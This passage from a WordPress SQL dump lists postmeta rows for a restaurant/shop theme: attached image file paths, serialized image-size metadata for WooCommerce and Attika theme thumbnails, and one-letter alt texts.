:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51358,4259,'_wp_attached_file','2018/07/shop-img-14.jpg'),(51359,4259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-14.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-14-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-14-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-14-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-14-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-14-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-14-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-14-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-14-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-14-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51360,4260,'_wp_attached_file','2018/08/chef-bio-left-img.png'),(51361,4260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:762;s:6:\"height\";i:527;s:4:\"file\";s:29:\"2018/08/chef-bio-left-img.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-300x207.png\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-650x527.png\";s:5:\"width\";i:650;s:6:\"height\";i:527;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-650x527.png\";s:5:\"width\";i:650;s:6:\"height\";i:527;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"chef-bio-left-img-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-600x415.png\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-600x415.png\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"chef-bio-left-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51362,4261,'_wp_attached_file','2018/07/h1-port-img-3.jpg'),(51363,4261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1240;s:4:\"file\";s:25:\"2018/07/h1-port-img-3.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-194x300.jpg\";s:5:\"width\";i:194;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h1-port-img-3-661x1024.jpg\";s:5:\"width\";i:661;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h1-port-img-3-768x1190.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1190;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h1-port-img-3-650x1240.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h1-port-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-600x930.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-600x930.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51364,4256,'_wp_attachment_image_alt','m'),(51365,4260,'_wp_attachment_image_alt','v'),(51366,4259,'_wp_attachment_image_alt','z'),(51367,4258,'_wp_attachment_image_alt','d'),(51368,4257,'_wp_attachment_image_alt','d'),(51369,4261,'_wp_attachment_image_alt','m'),(51370,4262,'_wp_attached_file','2018/08/chef-bio-content-img.jpg'),(51371,4262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:384;s:6:\"height\";i:576;s:4:\"file\";s:32:\"2018/08/chef-bio-content-img.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"chef-bio-content-img-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"chef-bio-content-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"chef-bio-content-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"chef-bio-content-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"chef-bio-content-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"chef-bio-content-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51372,4262,'_wp_attachment_image_alt','b'),(51373,4263,'_wp_attached_file','2018/07/port-single-img-3.jpg'),(51374,4263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1093;s:4:\"file\";s:29:\"2018/07/port-single-img-3.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"port-single-img-3-1024x861.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:861;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:30:\"port-single-img-3-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:30:\"port-single-img-3-650x1093.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1093;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"port-single-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-600x504.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-600x504.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"port-single-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51375,4264,'_wp_attached_file','2018/07/shop-img-15.jpg'),(51376,4264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-15.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-15-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-15-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-15-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-15-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-15-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-15-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-15-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-15-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-15-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51377,41,'_wp_attached_file','2018/07/shop-img-4.jpg'),(51378,41,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-4.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-4-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-4-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-4-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-4-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-4-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-4-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-4-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51379,4265,'_wp_attached_file','2018/08/food-menu-backround.jpg'),(51380,4265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:31:\"2018/08/food-menu-backround.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"food-menu-backround-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"food-menu-backround-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:32:\"food-menu-backround-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:32:\"food-menu-backround-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:33:\"food-menu-backround-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"food-menu-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"food-menu-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51381,4266,'_wp_attached_file','2018/07/h1-img-5.jpg'),(51382,4266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:817;s:6:\"height\";i:473;s:4:\"file\";s:20:\"2018/07/h1-img-5.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h1-img-5-300x174.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h1-img-5-768x445.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h1-img-5-650x473.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:20:\"h1-img-5-650x473.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h1-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h1-img-5-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h1-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h1-img-5-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51383,4267,'_wp_attached_file','2018/08/our-history-right-img.jpg'),(51384,4267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:862;s:6:\"height\";i:1109;s:4:\"file\";s:33:\"2018/08/our-history-right-img.jpg